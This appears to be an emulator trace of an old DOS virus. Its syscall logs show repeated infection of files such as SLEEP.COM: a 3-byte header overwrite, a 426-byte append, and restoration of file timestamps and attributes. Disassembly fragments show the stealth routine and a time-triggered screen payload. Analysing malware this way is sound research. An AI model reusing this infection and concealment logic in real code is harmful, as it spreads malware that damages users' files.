2018-12-25T12:40:45.037697287Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.047388883Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.051050507Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.061177972Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.067909044Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.074989915Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.077366856Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.080247288Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.0824727Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.085874675Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.088881411Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.090572879Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.098722123Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.113449025Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.116293331Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.126835826Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.133378482Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.139616281Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.142010259Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.144695123Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.146310326Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.149888822Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.15831297Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.16011293Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.168935189Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.179156244Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.181910959Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.19220466Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.198872676Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.205214821Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.207430523Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.210499085Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.212025651Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.215230312Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.218496517Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.220150506Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.227592125Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.238240057Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.240757674Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.251428729Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.258613663Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.265135379Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.266942786Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.27058056Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.272200885Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.274788729Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.282943512Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.284673615Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.292203016Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.303211074Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.30578393Z 59 PC: 12a75 | Change current directory
2018-12-25T12:40:45.310062976Z 59 PC: 12b26 | Change current directory
2018-12-25T12:40:45.312819637Z 44 PC: 12b3c | Get time 0x12b3c: cmp dh, 0x3b
0x12b3f: jne 0x12b6b
0x12b41: mov bh, 0
0x12b43: mov cx, 0xf00
0x12b46: mov dh, 0xc
0x12b48: mov dl, 5
0x12b4a: mov bl, 1
0x12b4c: push cx
0x12b4d: mov cx, 0x100
0x12b50: push ax
0x12b51: pop ax
0x12b52: loop 0x12b50
0x12b54: push bp
0x12b55: add bp, 0x25f
0x12b59: mov cx, 0x2d
0x12b5c: mov ah, 0x13
0x12b5e: int 0x10
0x12b60: pop bp
0x12b61: pop cx
0x12b62: inc bl

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14467,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:45.087896797Z 71 PC: 12a63 | Get current directory
2018-12-25T12:40:45.090935639Z 26 PC: 12b2f | Set disk transfer address
2018-12-25T12:40:45.091977593Z 78 PC: 12a84 | Find first file
2018-12-25T12:40:45.098690239Z 67 PC: 12aa1 | Get or set file attributes
2018-12-25T12:40:45.114528504Z 61 PC: 12aaa | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:40:45.121297448Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:40:45.127838037Z 66 PC: 12b37 | Move file pointer
2018-12-25T12:40:45.130490954Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:40:45.134081049Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.135813182Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5
0x12aee: mov byte ptr cs:[bp + 0x292], dh
0x12af3: call 0x12b6c
0x12af6: mov ax, 0x5701
0x12af9: mov dx, word ptr cs:[bp + 0x31c]
0x12afe: mov cx, word ptr cs:[bp + 0x31a]
0x12b03: int 0x21
0x12b05: mov ah, 0x3e
0x12b07: int 0x21
0x12b09: mov ax, 0x4301
0x12b0c: lea dx, word ptr [bp + 0x2cd]
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]
0x12b17: int 0x21
0x12b19: mov ah, 0x4f
0x12b1b: jmp 0x12a82
0x12b1e: lea dx, word ptr [bp + 0x2da]
0x12b22: mov ah, 0x3b
0x12b24: int 0x21
2018-12-25T12:40:45.139019187Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-25T12:40:45.144742954Z 87 PC: 12b05 | Get or set file date and time
2018-12-25T12:40:45.145942192Z 62 PC: 12b09 | Close file
2018-12-25T12:40:45.153279068Z 67 PC: 12b19 | Get or set file attributes
2018-12-25T12:40:45.163887592Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.165818962Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.176423495Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.183784946Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.188831196Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.190361284Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.192381106Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.19371552Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.197161872Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.200058442Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.201171802Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.214573001Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.225444673Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.228455704Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.239115918Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.245705562Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.252449853Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.263763028Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.26663178Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.268419022Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.278030465Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.297867091Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.299385342Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.316859721Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.327230413Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.332980553Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.355851477Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.372205993Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.38377836Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.385949793Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.389475875Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.390829926Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.399357833Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.407520466Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.409323272Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.416925471Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.430775692Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.433444975Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.44363785Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.451011985Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.457487672Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.458889379Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.462283133Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.463799797Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.466345167Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.470112172Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.472267353Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.485048687Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.518661647Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.521306544Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.535667126Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.559480363Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.56612308Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.56751625Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.57094969Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.574769492Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.577507592Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.595867608Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.597615889Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.604929923Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.616840919Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.619695001Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.629435019Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.636358277Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.643524029Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.644851589Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.647613274Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.649813827Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.652470552Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.656118755Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.658450182Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.666441138Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.676457664Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.679843471Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.689422047Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.696219047Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.699539002Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.700990484Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.703935671Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.706395682Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.709394122Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.712786674Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.715082301Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.722533709Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.729789942Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.733462542Z 59 PC: 12a75 | Change current directory
2018-12-25T12:40:45.742685106Z 59 PC: 12b26 | Change current directory
2018-12-25T12:40:45.74437939Z 44 PC: 12b3c | Get time 0x12b3c: cmp dh, 0x3b
0x12b3f: jne 0x12b6b
0x12b41: mov bh, 0
0x12b43: mov cx, 0xf00
0x12b46: mov dh, 0xc
0x12b48: mov dl, 5
0x12b4a: mov bl, 1
0x12b4c: push cx
0x12b4d: mov cx, 0x100
0x12b50: push ax
0x12b51: pop ax
0x12b52: loop 0x12b50
0x12b54: push bp
0x12b55: add bp, 0x25f
0x12b59: mov cx, 0x2d
0x12b5c: mov ah, 0x13
0x12b5e: int 0x10
0x12b60: pop bp
0x12b61: pop cx
0x12b62: inc bl

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":59,"TimeBased":true,"OriginalID":14467,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:45.235937474Z 71 PC: 12a63 | Get current directory
2018-12-25T12:40:45.23958735Z 26 PC: 12b2f | Set disk transfer address
2018-12-25T12:40:45.246056946Z 78 PC: 12a84 | Find first file
2018-12-25T12:40:45.253285635Z 67 PC: 12aa1 | Get or set file attributes
2018-12-25T12:40:45.27369484Z 61 PC: 12aaa | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:40:45.287027502Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:40:45.294082255Z 66 PC: 12b37 | Move file pointer
2018-12-25T12:40:45.295284301Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:40:45.298627486Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.300262393Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5
0x12aee: mov byte ptr cs:[bp + 0x292], dh
0x12af3: call 0x12b6c
0x12af6: mov ax, 0x5701
0x12af9: mov dx, word ptr cs:[bp + 0x31c]
0x12afe: mov cx, word ptr cs:[bp + 0x31a]
0x12b03: int 0x21
0x12b05: mov ah, 0x3e
0x12b07: int 0x21
0x12b09: mov ax, 0x4301
0x12b0c: lea dx, word ptr [bp + 0x2cd]
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]
0x12b17: int 0x21
0x12b19: mov ah, 0x4f
0x12b1b: jmp 0x12a82
0x12b1e: lea dx, word ptr [bp + 0x2da]
0x12b22: mov ah, 0x3b
0x12b24: int 0x21
2018-12-25T12:40:45.302514471Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-25T12:40:45.313038318Z 87 PC: 12b05 | Get or set file date and time
2018-12-25T12:40:45.314780009Z 62 PC: 12b09 | Close file
2018-12-25T12:40:45.32253013Z 67 PC: 12b19 | Get or set file attributes
2018-12-25T12:40:45.330851394Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.333275837Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.339866172Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.344946617Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.350408359Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.353058049Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.356621841Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.359322964Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.362459232Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.36604825Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.369159844Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.377620339Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.389141001Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.392228611Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.402035348Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.409518632Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.416508749Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.418020376Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.420147558Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.421970222Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.425501772Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.435333503Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.437494894Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.447232014Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.457975326Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.461252886Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.473482442Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.481010535Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.488722889Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.494379915Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.497364697Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.499089323Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.502351085Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.505572807Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.507127481Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.515980697Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.528003586Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.530993933Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.54222378Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.550109466Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.558736354Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.560621111Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.564199695Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.56577958Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.568493658Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.572143135Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.573888332Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.582526463Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.594255031Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.597213524Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.609020769Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.618665629Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.626109146Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.627840715Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.630571161Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.632078215Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.634864999Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.643071268Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.646342393Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.654825799Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.665610264Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.668862418Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.679544089Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.687607698Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.695031196Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.696400405Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.699002258Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.700862782Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.703343314Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.706341553Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.708417958Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.71641369Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.727051434Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.730628667Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.741834597Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.749998705Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.755672273Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.757226967Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.760264733Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.762907125Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.765990065Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.774150773Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.777140202Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.786079454Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.796179871Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.79869371Z 59 PC: 12a75 | Change current directory
2018-12-25T12:40:45.803289102Z 59 PC: 12b26 | Change current directory
2018-12-25T12:40:45.805357313Z 44 PC: 12b3c | Get time 0x12b3c: cmp dh, 0x3b
0x12b3f: jne 0x12b6b
0x12b41: mov bh, 0
0x12b43: mov cx, 0xf00
0x12b46: mov dh, 0xc
0x12b48: mov dl, 5
0x12b4a: mov bl, 1
0x12b4c: push cx
0x12b4d: mov cx, 0x100
0x12b50: push ax
0x12b51: pop ax
0x12b52: loop 0x12b50
0x12b54: push bp
0x12b55: add bp, 0x25f
0x12b59: mov cx, 0x2d
0x12b5c: mov ah, 0x13
0x12b5e: int 0x10
0x12b60: pop bp
0x12b61: pop cx
0x12b62: inc bl

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14467,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:45.362686818Z 71 PC: 12a63 | Get current directory
2018-12-25T12:40:45.36565813Z 26 PC: 12b2f | Set disk transfer address
2018-12-25T12:40:45.367225028Z 78 PC: 12a84 | Find first file
2018-12-25T12:40:45.37437621Z 67 PC: 12aa1 | Get or set file attributes
2018-12-25T12:40:45.389604265Z 61 PC: 12aaa | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:40:45.400916249Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:40:45.409374211Z 66 PC: 12b37 | Move file pointer
2018-12-25T12:40:45.411001894Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:40:45.415584976Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.417383363Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5
0x12aee: mov byte ptr cs:[bp + 0x292], dh
0x12af3: call 0x12b6c
0x12af6: mov ax, 0x5701
0x12af9: mov dx, word ptr cs:[bp + 0x31c]
0x12afe: mov cx, word ptr cs:[bp + 0x31a]
0x12b03: int 0x21
0x12b05: mov ah, 0x3e
0x12b07: int 0x21
0x12b09: mov ax, 0x4301
0x12b0c: lea dx, word ptr [bp + 0x2cd]
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]
0x12b17: int 0x21
0x12b19: mov ah, 0x4f
0x12b1b: jmp 0x12a82
0x12b1e: lea dx, word ptr [bp + 0x2da]
0x12b22: mov ah, 0x3b
0x12b24: int 0x21
2018-12-25T12:40:45.419879592Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-25T12:40:45.429046053Z 87 PC: 12b05 | Get or set file date and time
2018-12-25T12:40:45.43086545Z 62 PC: 12b09 | Close file
2018-12-25T12:40:45.438394783Z 67 PC: 12b19 | Get or set file attributes
2018-12-25T12:40:45.44898659Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.451727608Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.461272698Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.47240569Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.479358755Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.480973153Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.484120825Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.488089536Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.495080758Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.50035804Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.503510451Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.511768133Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.521792239Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.525961469Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.535877543Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.542644293Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.550973945Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.552839007Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.555783119Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.558350815Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.561344686Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.569692221Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.572806985Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.580837826Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.613077921Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.615673921Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.627354644Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.633773773Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.641521958Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.643463768Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.64612022Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.647899098Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.650940905Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.65394598Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.655816277Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.663800775Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.673559039Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.677331927Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.687330816Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.694015063Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.700652723Z 66 PC: 12b37 | Move file pointer (See above)
